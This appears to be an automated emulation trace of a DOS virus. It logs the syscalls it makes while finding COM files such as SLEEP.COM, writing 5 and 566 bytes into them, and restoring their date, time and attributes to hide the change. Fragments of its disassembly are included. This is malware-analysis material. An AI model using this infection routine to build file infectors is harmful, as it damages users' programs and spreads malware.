2018-12-25T11:43:13.806385555Z	42	PC: 12b79 \| Get date 0x12b79: cmp cx, 0x7d0 0x12b7d: jb 0x12b87 0x12b7f: mov ah, 9 0x12b81: lea dx, word ptr [bp + 0x291] 0x12b85: int 0x21 0x12b87: ret 0x12b88: mov ah, 0x42 0x12b8a: xor cx, cx 0x12b8c: xor dx, dx 0x12b8e: int 0x21 0x12b90: ret 0x12b91: mov ah, 0x1a 0x12b93: int 0x21 0x12b95: ret 0x12b96: mov ah, 0x3d 0x12b98: lea dx, word ptr [bp + 0x3b5] 0x12b9c: int 0x21 0x12b9e: xchg ax, bx 0x12b9f: ret 0x12ba0: mov ax, 0x4301
2018-12-25T11:43:13.808788674Z	37	PC: 12aa8 \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:43:13.811204875Z	59	PC: 12ab2 \| Change current directory
2018-12-25T11:43:13.813063744Z	26	PC: 12b95 \| Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":1266,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:43:12.564904789Z	61	PC: 12a4e \| Open file (Filename = 'is started by using +the SHELL command in the CONFIG.SYS file. F##¸#ã#,$z$À$%U% %à%,&y&')
2018-12-25T11:43:12.57023093Z	26	PC: 12b95 \| Set disk transfer address
2018-12-25T11:43:12.571199657Z	53	PC: 12a6c \| Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:43:12.572158058Z	37	PC: 12a7e \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:43:12.57355867Z	71	PC: 12a8a \| Get current directory
2018-12-25T11:43:12.576198514Z	78	PC: 12ac0 \| Find first file
2018-12-25T11:43:12.581935198Z	61	PC: 12b9e \| Open file (Filename = 'SLEEP.COM')
2018-12-25T11:43:12.588667561Z	63	PC: 12af1 \| Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:43:12.594893495Z	62	PC: 12af5 \| Close file
2018-12-25T11:43:12.596777099Z	67	PC: 12ba9 \| Get or set file attributes
2018-12-25T11:43:12.924468644Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:12.931230378Z	64	PC: 12b3f \| Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:43:12.937901864Z	66	PC: 12b90 \| Move file pointer
2018-12-25T11:43:12.940623045Z	44	PC: 12b4a \| Get time 0x12b4a: cmp dh, 0 0x12b4d: je 0x12b46 0x12b4f: mov byte ptr cs:[bp + 0x33a], dh 0x12b54: call 0x12c36 0x12b57: mov ax, 0x5701 0x12b5a: mov cx, word ptr cs:[bp + 0x3ad] 0x12b5f: mov dx, word ptr cs:[bp + 0x3af] 0x12b64: int 0x21 0x12b66: mov ah, 0x3e 0x12b68: int 0x21 0x12b6a: xor cx, cx 0x12b6c: mov cl, byte ptr cs:[bp + 0x3ac] 0x12b71: call 0x12ba0 0x12b74: ret 0x12b75: mov ah, 0x2a 0x12b77: int 0x21 0x12b79: cmp cx, 0x7d0 0x12b7d: jb 0x12b87 0x12b7f: mov ah, 9 0x12b81: lea dx, word ptr [bp + 0x291]
2018-12-25T11:43:12.946964202Z	64	PC: 12c8e \| Write file or device (Write 566 bytes on handle 5)
2018-12-25T11:43:12.955399321Z	87	PC: 12b66 \| Get or set file date and time
2018-12-25T11:43:12.958457485Z	62	PC: 12b6a \| Close file
2018-12-25T11:43:12.966300534Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:12.976746404Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:12.980278117Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:12.987177607Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:12.994145198Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:12.997342095Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.007536825Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.014189362Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:13.017031671Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:13.018518088Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:13.020936833Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:13.029129939Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:13.031606296Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:13.039216908Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.0467156Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:13.052388431Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.061919035Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:13.068248683Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:13.070865821Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.287898728Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.293221851Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:13.295728115Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:13.296727254Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:13.29829667Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:13.374804774Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:13.37683985Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:13.384656949Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.397850801Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:13.402888856Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.411612097Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:13.421328782Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:13.423602871Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.727422993Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.738497941Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:13.744288239Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:13.74999789Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:13.759163232Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:13.767952844Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:13.769368255Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:13.777774983Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.788043905Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:13.790911141Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.797591951Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:13.805298086Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:13.807466656Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.812109896Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.823532207Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:13.826562255Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:13.828260583Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:13.832369745Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:13.842098672Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:13.84369603Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:13.84676347Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.85043152Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:13.855901055Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.861365369Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:13.865964895Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:13.867632783Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.875409506Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.881916679Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:13.884684862Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:13.887256139Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:13.891259879Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:13.901466005Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:13.903498944Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:13.910906163Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.921196096Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:13.924916702Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.931606559Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:13.938976187Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:13.945751323Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.955450616Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.96078152Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:13.96301244Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:13.964160113Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:13.965790643Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:13.971591643Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:13.972662111Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:13.977564961Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.986982702Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:13.990580503Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.996799482Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:14.003104373Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:14.005426141Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:14.007997747Z	59	PC: 12a99 \| Change current directory
2018-12-25T11:43:14.01296647Z	42	PC: 12b79 \| Get date 0x12b79: cmp cx, 0x7d0 0x12b7d: jb 0x12b87 0x12b7f: mov ah, 9 0x12b81: lea dx, word ptr [bp + 0x291] 0x12b85: int 0x21 0x12b87: ret 0x12b88: mov ah, 0x42 0x12b8a: xor cx, cx 0x12b8c: xor dx, dx 0x12b8e: int 0x21 0x12b90: ret 0x12b91: mov ah, 0x1a 0x12b93: int 0x21 0x12b95: ret 0x12b96: mov ah, 0x3d 0x12b98: lea dx, word ptr [bp + 0x3b5] 0x12b9c: int 0x21 0x12b9e: xchg ax, bx 0x12b9f: ret 0x12ba0: mov ax, 0x4301
2018-12-25T11:43:14.015369937Z	37	PC: 12aa8 \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:43:14.016536563Z	59	PC: 12ab2 \| Change current directory
2018-12-25T11:43:14.019036946Z	26	PC: 12b95 \| Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":1266,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:43:12.641676422Z	61	PC: 12a4e \| Open file (Filename = 'is started by using +the SHELL command in the CONFIG.SYS file. F##¸#ã#,$z$À$%U% %à%,&y&')
2018-12-25T11:43:12.648337456Z	26	PC: 12b95 \| Set disk transfer address
2018-12-25T11:43:12.649477574Z	53	PC: 12a6c \| Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:43:12.65077696Z	37	PC: 12a7e \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:43:12.652869221Z	71	PC: 12a8a \| Get current directory
2018-12-25T11:43:12.655906341Z	78	PC: 12ac0 \| Find first file
2018-12-25T11:43:12.667854302Z	61	PC: 12b9e \| Open file (Filename = 'SLEEP.COM')
2018-12-25T11:43:12.679054913Z	63	PC: 12af1 \| Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:43:12.686647105Z	62	PC: 12af5 \| Close file
2018-12-25T11:43:12.688867742Z	67	PC: 12ba9 \| Get or set file attributes
2018-12-25T11:43:12.913467157Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:12.923503559Z	64	PC: 12b3f \| Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:43:12.926529861Z	66	PC: 12b90 \| Move file pointer
2018-12-25T11:43:12.92814409Z	44	PC: 12b4a \| Get time 0x12b4a: cmp dh, 0 0x12b4d: je 0x12b46 0x12b4f: mov byte ptr cs:[bp + 0x33a], dh 0x12b54: call 0x12c36 0x12b57: mov ax, 0x5701 0x12b5a: mov cx, word ptr cs:[bp + 0x3ad] 0x12b5f: mov dx, word ptr cs:[bp + 0x3af] 0x12b64: int 0x21 0x12b66: mov ah, 0x3e 0x12b68: int 0x21 0x12b6a: xor cx, cx 0x12b6c: mov cl, byte ptr cs:[bp + 0x3ac] 0x12b71: call 0x12ba0 0x12b74: ret 0x12b75: mov ah, 0x2a 0x12b77: int 0x21 0x12b79: cmp cx, 0x7d0 0x12b7d: jb 0x12b87 0x12b7f: mov ah, 9 0x12b81: lea dx, word ptr [bp + 0x291]
2018-12-25T11:43:12.938119441Z	64	PC: 12c8e \| Write file or device (Write 566 bytes on handle 5)
2018-12-25T11:43:12.959011569Z	87	PC: 12b66 \| Get or set file date and time
2018-12-25T11:43:12.960855931Z	62	PC: 12b6a \| Close file
2018-12-25T11:43:12.969353424Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:12.97975847Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:12.982691994Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:12.989945134Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:12.996850083Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:12.998932956Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.008993858Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.021610386Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:13.028022729Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:13.029641111Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:13.03340023Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:13.043064112Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:13.045802881Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:13.055099967Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.287999144Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:13.289828599Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.294642704Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:13.298749874Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:13.301199101Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.374645611Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.382403254Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:13.388024871Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:13.390557615Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:13.393294247Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:13.401914769Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:13.404912766Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:13.562415072Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.725337422Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:13.728024702Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.735377625Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:13.742329909Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:13.744931684Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.755411882Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.761979988Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:13.765185342Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:13.766975095Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:13.769264812Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:13.778163105Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:13.78115791Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:13.7895528Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.79935654Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:13.803312426Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.809732503Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:13.816016877Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:13.818885797Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.82311865Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.830227664Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:13.834042623Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:13.835458413Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:13.837739039Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:13.855025787Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:13.856338773Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:13.858011301Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.862894144Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:13.866166005Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.872366599Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:13.878888983Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:13.880790713Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.890104413Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.89742945Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:13.900461546Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:13.901814075Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:13.90516875Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:13.913690374Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:13.915195283Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:13.923174074Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.93406459Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:13.936823783Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.943930595Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:13.950336067Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:13.951905622Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.959270588Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.964156013Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:13.966088568Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:13.968066094Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:13.970518685Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:13.976730209Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:13.978819456Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:13.995837938Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:14.006154109Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:14.009340234Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:14.015960071Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:14.02253555Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:14.025406402Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:14.028234152Z	59	PC: 12a99 \| Change current directory
2018-12-25T11:43:14.032601125Z	42	PC: 12b79 \| Get date 0x12b79: cmp cx, 0x7d0 0x12b7d: jb 0x12b87 0x12b7f: mov ah, 9 0x12b81: lea dx, word ptr [bp + 0x291] 0x12b85: int 0x21 0x12b87: ret 0x12b88: mov ah, 0x42 0x12b8a: xor cx, cx 0x12b8c: xor dx, dx 0x12b8e: int 0x21 0x12b90: ret 0x12b91: mov ah, 0x1a 0x12b93: int 0x21 0x12b95: ret 0x12b96: mov ah, 0x3d 0x12b98: lea dx, word ptr [bp + 0x3b5] 0x12b9c: int 0x21 0x12b9e: xchg ax, bx 0x12b9f: ret 0x12ba0: mov ax, 0x4301
2018-12-25T11:43:14.036403135Z	37	PC: 12aa8 \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:43:14.038253781Z	59	PC: 12ab2 \| Change current directory
2018-12-25T11:43:14.040282843Z	26	PC: 12b95 \| Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":1266,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:43:12.682980294Z	61	PC: 12a4e \| Open file (Filename = 'is started by using +the SHELL command in the CONFIG.SYS file. F##¸#ã#,$z$À$%U% %à%,&y&')
2018-12-25T11:43:12.687917925Z	26	PC: 12b95 \| Set disk transfer address
2018-12-25T11:43:12.689958781Z	53	PC: 12a6c \| Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:43:12.700486706Z	37	PC: 12a7e \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:43:12.701878927Z	71	PC: 12a8a \| Get current directory
2018-12-25T11:43:12.70491617Z	78	PC: 12ac0 \| Find first file
2018-12-25T11:43:12.716488788Z	61	PC: 12b9e \| Open file (Filename = 'SLEEP.COM')
2018-12-25T11:43:12.728405107Z	63	PC: 12af1 \| Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:43:12.734479011Z	62	PC: 12af5 \| Close file
2018-12-25T11:43:12.736627794Z	67	PC: 12ba9 \| Get or set file attributes
2018-12-25T11:43:12.916739888Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:12.923584387Z	64	PC: 12b3f \| Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:43:12.9261552Z	66	PC: 12b90 \| Move file pointer
2018-12-25T11:43:12.92729449Z	44	PC: 12b4a \| Get time 0x12b4a: cmp dh, 0 0x12b4d: je 0x12b46 0x12b4f: mov byte ptr cs:[bp + 0x33a], dh 0x12b54: call 0x12c36 0x12b57: mov ax, 0x5701 0x12b5a: mov cx, word ptr cs:[bp + 0x3ad] 0x12b5f: mov dx, word ptr cs:[bp + 0x3af] 0x12b64: int 0x21 0x12b66: mov ah, 0x3e 0x12b68: int 0x21 0x12b6a: xor cx, cx 0x12b6c: mov cl, byte ptr cs:[bp + 0x3ac] 0x12b71: call 0x12ba0 0x12b74: ret 0x12b75: mov ah, 0x2a 0x12b77: int 0x21 0x12b79: cmp cx, 0x7d0 0x12b7d: jb 0x12b87 0x12b7f: mov ah, 9 0x12b81: lea dx, word ptr [bp + 0x291]
2018-12-25T11:43:12.92895137Z	64	PC: 12c8e \| Write file or device (Write 566 bytes on handle 5)
2018-12-25T11:43:12.934672327Z	87	PC: 12b66 \| Get or set file date and time
2018-12-25T11:43:12.942391086Z	62	PC: 12b6a \| Close file
2018-12-25T11:43:12.950146323Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:12.97011683Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:12.973239379Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:12.979884941Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:12.986455995Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:12.991782248Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.011923114Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.018750113Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:13.022269234Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:13.023908339Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:13.027168983Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:13.036184417Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:13.038098451Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:13.054820447Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.254266075Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:13.257013169Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.263914816Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:13.271467117Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:13.273290044Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.372834564Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.39766471Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:13.403161497Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:13.404855334Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:13.409022052Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:13.725765122Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:13.727939751Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:13.738494513Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.749555939Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:13.752573482Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.760213344Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:13.768087588Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:13.770733448Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.781462937Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.789620596Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:13.79273736Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:13.79474708Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:13.798421296Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:13.807886242Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:13.809689459Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:13.819755835Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.832456471Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:13.835406095Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.843244065Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:13.849703172Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:13.851857981Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.857542889Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.864076416Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:13.86626649Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:13.868240293Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:13.870288268Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:13.883218257Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:13.885924798Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:13.887535115Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.892169839Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:13.899289841Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.904969344Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:13.911548694Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:13.914181204Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.924751024Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.93287922Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:13.937734973Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:13.94192725Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:13.946542996Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:13.954583336Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:13.956051067Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:13.961289849Z	67	PC: 12ba9 \| Get or set file attributes (See above)
